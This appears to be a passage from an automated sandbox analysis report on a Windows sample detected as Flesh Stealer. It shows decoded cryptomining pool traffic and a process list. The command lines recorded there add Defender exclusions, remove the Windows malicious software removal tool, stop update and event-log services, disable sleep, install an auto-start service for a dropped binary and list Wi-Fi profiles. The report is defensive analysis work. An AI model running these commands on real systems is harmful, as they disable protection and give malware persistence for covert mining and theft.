                                                    2024-09-17 02:00:18 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 32 63 35 61 33 62 37 30 36 35 35 33 35 38 61 62 38 31 63 37 66 36 38 31 37 65 63 38 64 62 37 39 64 37 31 62 61 34 30 63 64 62 30 66 62 34 64 33 32 61 65 62 62 64 34 32 31 31 30 34 38 30 37 32 64 62 62 32 35 64 64 36 30 30 30 30 30 30 30 30 30 34 32 32 32 33 31 35 30 62 65 66 63 63 66 63 30 38 36 63 32 66 30 37 63 33 39 33 33 61 35 66 64 34 34 30 39 30 65 33 65 35 65 33 64 34 38 31 65 37 65 36 34 61 64 30 36 38 32 31 65 30 66 39 62 31 63 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 65 34 33 31 33 38 35 35 2d 37 63 31 37 2d 34 38 66 31 2d 62 66 62 35 2d 34 31 37 37 62 66 31 39 39 39 62 35 22 2c 22 74 61
                                                    Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010b2c5a3b70655358ab81c7f6817ec8db79d71ba40cdb0fb4d32aebbd4211048072dbb25dd600000000042223150befccfc086c2f07c3933a5fd44090e3e5e3d481e7e64ad06821e0f9b1c","job_id":"e4313855-7c17-48f1-bfb5-4177bf1999b5","ta
                                                    2024-09-17 02:00:23 UTC256OUTData Raw: 7b 22 69 64 22 3a 33 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 73 75 62 6d 69 74 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 69 64 22 3a 22 62 62 33 38 62 39 62 35 2d 31 65 66 66 2d 34 38 39 65 2d 38 66 31 63 2d 61 39 66 32 36 38 61 35 38 64 65 39 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 65 34 33 31 33 38 35 35 2d 37 63 31 37 2d 34 38 66 31 2d 62 66 62 35 2d 34 31 37 37 62 66 31 39 39 39 62 35 22 2c 22 6e 6f 6e 63 65 22 3a 22 64 66 38 65 30 30 30 30 22 2c 22 72 65 73 75 6c 74 22 3a 22 33 31 30 64 30 38 65 65 35 33 65 61 32 37 63 31 38 61 66 64 62 63 36 64 33 65 61 64 66 64 62 39 63 63 65 32 65 30 66 66 30 61 63 30 31 30 30 61 31 31 63 35 65 31 61 63 33 61 30 66 30 30 30 30 22 2c 22 61 6c 67 6f 22 3a 22 72 78 2f 30 22 7d 7d 0d
                                                    Data Ascii: {"id":3,"jsonrpc":"2.0","method":"submit","params":{"id":"bb38b9b5-1eff-489e-8f1c-a9f268a58de9","job_id":"e4313855-7c17-48f1-bfb5-4177bf1999b5","nonce":"df8e0000","result":"310d08ee53ea27c18afdbc6d3eadfdb9cce2e0ff0ac0100a11c5e1ac3a0f0000","algo":"rx/0"}}
                                                    2024-09-17 02:00:23 UTC63INData Raw: 7b 22 69 64 22 3a 33 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 4f 4b 22 7d 7d 0a
                                                    Data Ascii: {"id":3,"jsonrpc":"2.0","error":null,"result":{"status":"OK"}}
                                                    2024-09-17 02:00:40 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 38 63 35 61 33 62 37 30 36 35 35 33 35 38 61 62 38 31 63 37 66 36 38 31 37 65 63 38 64 62 37 39 64 37 31 62 61 34 30 63 64 62 30 66 62 34 64 33 32 61 65 62 62 64 34 32 31 31 30 34 38 30 37 32 64 62 62 32 35 64 64 36 30 30 30 30 30 30 30 30 30 61 65 39 66 35 66 30 66 34 32 38 30 38 35 30 66 66 64 65 62 35 31 38 39 35 64 37 61 35 34 31 38 35 32 36 38 33 64 64 30 63 30 38 38 32 37 32 35 33 36 33 38 34 62 65 32 63 30 66 36 61 61 65 37 31 66 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 38 63 32 66 39 37 66 36 2d 38 63 35 35 2d 34 65 31 61 2d 39 63 30 32 2d 64 30 65 66 66 66 62 31 61 31 65 66 22 2c 22 74 61
                                                    Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010c8c5a3b70655358ab81c7f6817ec8db79d71ba40cdb0fb4d32aebbd4211048072dbb25dd6000000000ae9f5f0f4280850ffdeb51895d7a541852683dd0c088272536384be2c0f6aae71f","job_id":"8c2f97f6-8c55-4e1a-9c02-d0efffb1a1ef","ta
                                                    2024-09-17 02:01:02 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 65 63 35 61 33 62 37 30 36 35 35 33 35 38 61 62 38 31 63 37 66 36 38 31 37 65 63 38 64 62 37 39 64 37 31 62 61 34 30 63 64 62 30 66 62 34 64 33 32 61 65 62 62 64 34 32 31 31 30 34 38 30 37 32 64 62 62 32 35 64 64 36 30 30 30 30 30 30 30 30 30 35 61 39 36 62 31 30 36 66 34 65 37 35 36 35 34 62 61 37 31 62 33 36 32 39 63 34 61 61 36 65 63 61 31 39 65 35 66 62 65 31 65 37 64 61 31 61 39 63 63 39 36 33 36 62 33 65 34 30 30 39 30 35 66 32 36 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 33 64 30 35 32 62 34 63 2d 62 63 64 34 2d 34 39 36 36 2d 38 65 30 61 2d 33 65 66 33 35 39 65 38 38 30 36 36 22 2c 22 74 61
                                                    Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010dec5a3b70655358ab81c7f6817ec8db79d71ba40cdb0fb4d32aebbd4211048072dbb25dd60000000005a96b106f4e75654ba71b3629c4aa6eca19e5fbe1e7da1a9cc9636b3e400905f26","job_id":"3d052b4c-bcd4-4966-8e0a-3ef359e88066","ta


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:21:59:44
                                                    Start date:16/09/2024
                                                    Path:C:\Users\user\Desktop\System.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\System.exe"
                                                    Imagebase:0x1768e5f0000
                                                    File size:294'400 bytes
                                                    MD5 hash:043C5D0495CD21A75FDF7A2AB4AE0D2C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FleshStealer, Description: Yara detected Flesh Stealer, Source: 00000000.00000002.295346194625.00000176A1193000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FleshStealer, Description: Yara detected Flesh Stealer, Source: 00000000.00000002.295346194625.00000176A0FCE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FleshStealer, Description: Yara detected Flesh Stealer, Source: 00000000.00000002.295340608074.0000017690547000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:21:59:46
                                                    Start date:16/09/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"
                                                    Imagebase:0x7ff73fd20000
                                                    File size:2'660'352 bytes
                                                    MD5 hash:B0601C9443DD3B7A6B02EE764791C9AD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 88%, ReversingLabs
                                                    • Detection: 81%, Virustotal, Browse
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:21:59:46
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
                                                    Imagebase:0x7ff6438e0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:4
                                                    Start time:21:59:46
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:21:59:46
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\chcp.com
                                                    Wow64 process (32bit):false
                                                    Commandline:chcp 65001
                                                    Imagebase:0x7ff7bc160000
                                                    File size:14'848 bytes
                                                    MD5 hash:CA9A549C17932F9CAA154B5528EBD8D4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:6
                                                    Start time:21:59:46
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\netsh.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:netsh wlan show profiles
                                                    Imagebase:0x7ff7aa410000
                                                    File size:96'768 bytes
                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:21:59:46
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\findstr.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:findstr All
                                                    Imagebase:0x7ff7bbdd0000
                                                    File size:36'352 bytes
                                                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:8
                                                    Start time:21:59:51
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                    Imagebase:0x7ff696e20000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:9
                                                    Start time:21:59:51
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:11
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                    Imagebase:0x7ff6438e0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:12
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:13
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                    Imagebase:0x7ff644e20000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:14
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:15
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\wusa.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                    Imagebase:0x7ff685d90000
                                                    File size:316'416 bytes
                                                    MD5 hash:E43499EE2B4CF328A81BACE9B1644C5D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:16
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                    Imagebase:0x7ff644e20000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:17
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:18
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                    Imagebase:0x7ff644e20000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:19
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:20
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe stop bits
                                                    Imagebase:0x7ff644e20000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:21
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:22
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                    Imagebase:0x7ff644e20000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:23
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:24
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                    Imagebase:0x7ff71c480000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:25
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                    Imagebase:0x7ff71c480000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:26
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:27
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                    Imagebase:0x7ff71c480000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:28
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:29
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                    Imagebase:0x7ff71c480000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:30
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:31
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe delete "NUOIJWEW"
                                                    Imagebase:0x7ff644e20000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:32
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:33
                                                    Start time:21:59:53
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:34
                                                    Start time:21:59:54
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe create "NUOIJWEW" binpath= "C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe" start= "auto"
                                                    Imagebase:0x7ff644e20000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:35
                                                    Start time:21:59:54
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:36
                                                    Start time:21:59:54
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                    Imagebase:0x7ff644e20000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:37
                                                    Start time:21:59:54
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe start "NUOIJWEW"
                                                    Imagebase:0x7ff644e20000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:38
                                                    Start time:21:59:54
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:39
                                                    Start time:21:59:54
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:40
                                                    Start time:21:59:54
                                                    Start date:16/09/2024
                                                    Path:C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe
                                                    Imagebase:0x7ff7938d0000
                                                    File size:2'660'352 bytes
                                                    MD5 hash:B0601C9443DD3B7A6B02EE764791C9AD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 81%, Virustotal, Browse
                                                    • Detection: 88%, ReversingLabs
                                                    Has exited:true

                                                    General

                                                    Target ID:41
                                                    Start time:21:59:54
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                    Imagebase:0x7ff696e20000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:42
                                                    Start time:21:59:54
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:43
                                                    Start time:21:59:55
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                    Imagebase:0x7ff6438e0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:44
                                                    Start time:21:59:55
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                    Imagebase:0x7ff644e20000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
